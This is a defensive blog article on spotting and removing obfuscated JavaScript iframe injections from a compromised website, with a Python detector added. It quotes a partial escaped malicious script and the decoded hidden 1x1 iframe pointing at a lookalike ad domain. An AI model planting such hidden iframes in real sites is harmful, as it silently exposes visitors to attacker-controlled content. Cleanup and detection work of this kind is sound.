I have written several popular articles on iframe injections which you can read by visiting:

The people who implemented my suggestions reported they had quite a bit of success in avoiding these malicious iframe injection attacks. Their websites were now safe and their traffic was continuous.

I had a friend who was a victim of these iframe injection attacks. When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some code that was obfuscated and that my friend had no explanation for.

Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

[Script Language='Javascript']
1D%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
[/Script]

Researching the issue further, I found a website that was able to deobfuscate, or decrypt, the code at:

What you do is copy only the obfuscated code as shown below:

72%61%6D%65%3E

You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

[iframe src= http: //goooogleadsence.biz/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ][ iframe]

By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.

If you implement my suggestions, particularly the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript code. One must not forget though, that no website will ever be 100% secure, which is why we must always practise preventative measures.

It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting, just to be sure, if you are not certain.
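The manual check described above can be done offline, because the %XX escapes are a reversible encoding that needs no key. The following is an added example, not code from the original article: it decodes long escape runs in a page and reports only iframes that are sized or styled to be invisible, so legitimate iframes are left alone. The function names, the marker list, the eight-escape threshold and the sample page (with its example.invalid hosts and its document.write(unescape(...)) wrapper) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Eight or more consecutive %XX escapes: the shape of the escaped code shown above.
ESCAPED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Signs that an iframe is meant not to be seen (assumed marker list).
HIDDEN_MARKERS = (
    re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01]\b", re.IGNORECASE),
    re.compile(r"visibility\s*:\s*hidden", re.IGNORECASE),
    re.compile(r"display\s*:\s*none", re.IGNORECASE),
)

def percent_escape(text):
    """Escape every character as %XX; used only to build the sample below."""
    return "".join("%%%02X" % b for b in text.encode("latin-1"))

def find_hidden_iframes(html):
    """Return (iframe_tag, was_escaped) for every hidden iframe in html."""
    # Check the page as written, then each escape run after decoding it.
    candidates = [(html, False)]
    for m in ESCAPED_RUN.finditer(html):
        # latin-1 maps each %XX to one character, as JavaScript unescape() does.
        candidates.append((unquote(m.group(0), encoding="latin-1"), True))
    findings = []
    for text, was_escaped in candidates:
        for tag in IFRAME_TAG.findall(text):
            if any(p.search(tag) for p in HIDDEN_MARKERS):
                findings.append((tag, was_escaped))
    return findings

# Constructed sample page: one legitimate iframe and one escaped, hidden one.
HIDDEN = (
    '<iframe src="http://injected.example.invalid/x" width=1 height=1 '
    'style="visibility:hidden;position:absolute"></iframe>'
)
SAMPLE_PAGE = (
    "<html><body>\n"
    '<iframe src="https://maps.example.invalid/embed" width="600" height="400"></iframe>\n'
    "<script language='javascript'>\n<!--\n"
    "document.write(unescape('" + percent_escape(HIDDEN) + "'));\n"
    "//-->\n</script>\n</body></html>\n"
)

if __name__ == "__main__":
    for tag, was_escaped in find_hidden_iframes(SAMPLE_PAGE):
        print("escaped" if was_escaped else "plain", tag)
```

JavaScript's unescape() also accepts %uXXXX sequences, which this example does not decode; a page using them needs that case added before a clean result can be trusted.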